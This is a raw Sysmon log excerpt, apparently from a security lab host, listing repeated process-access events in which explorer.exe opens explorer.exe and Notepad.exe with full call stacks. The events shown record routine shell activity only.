22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696564Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696563Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696562Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696561Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696560Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696559Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696558Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696557Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696556Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696555Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696554Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696553Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696552Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696551Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696550Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696549Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696548Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696547Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696546Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696545Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696544Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696543Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696542Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696541Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696540Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-706F-603D-5688-00000000AD01}5956C:\Windows\SYSTEM32\Notepad.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696539Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 